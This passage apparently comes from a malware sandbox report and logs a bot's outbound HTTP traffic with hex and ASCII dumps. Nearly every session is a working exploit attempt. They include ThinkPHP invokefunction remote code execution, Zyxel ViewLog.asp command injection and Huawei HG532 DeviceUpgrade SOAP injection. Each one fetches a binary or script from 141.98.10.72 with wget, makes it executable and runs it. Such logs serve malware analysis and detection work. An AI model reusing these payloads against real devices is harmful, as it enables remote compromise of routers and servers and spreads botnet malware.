                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:48.594358921 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.25.2
                                                        Date: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1241192.168.2.145628695.58.243.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.423648119 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:48.719515085 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:35:48.719572067 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1242192.168.2.144583095.100.108.6580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.476564884 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:48.823312044 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 36 63 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 34 38 26 23 34 36 3b 34 34 64 36 33 61 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3d6c645f&#46;1707899748&#46;44d63a9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1243192.168.2.144858462.248.139.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.520787001 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:48.741652966 CET561INHTTP/1.1 404 Not Found
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: Content-Type
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Wed, 14 Feb 2024 08:35:47 GMT
                                                        Server: WebServer
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1244192.168.2.145750895.100.15.10080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.537677050 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:48.945761919 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 65 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 37 34 38 26 23 34 36 3b 33 34 34 39 65 33 63 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6e722c31&#46;1707899748&#46;3449e3ca</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1245192.168.2.145935031.200.55.2528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.585779905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1246192.168.2.143537094.122.86.1768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.590069056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1247192.168.2.146096094.154.83.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.818883896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:49.128576040 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1248192.168.2.1447158112.74.106.18780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.883788109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:49.240370989 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1249192.168.2.144428041.47.110.15737215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:49.359847069 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Feb 14, 2024 09:35:49.633404016 CET182INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/xml; charset="utf-8"
                                                        Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                        EXT:
                                                        Connection: Keep-Alive
                                                        Content-Length: 398


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1250192.168.2.144635295.164.8.7780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:49.464133024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:49.672276974 CET991INHTTP/1.1 400 Bad Request
                                                        content-type: text/html
                                                        cache-control: private, no-cache, max-age=0
                                                        pragma: no-cache
                                                        content-length: 767
                                                        date: Wed, 14 Feb 2024 08:35:49 GMT
                                                        server: LiteSpeed
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1251192.168.2.144165031.136.174.2508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.354233980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.074222088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.482163906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.490053892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
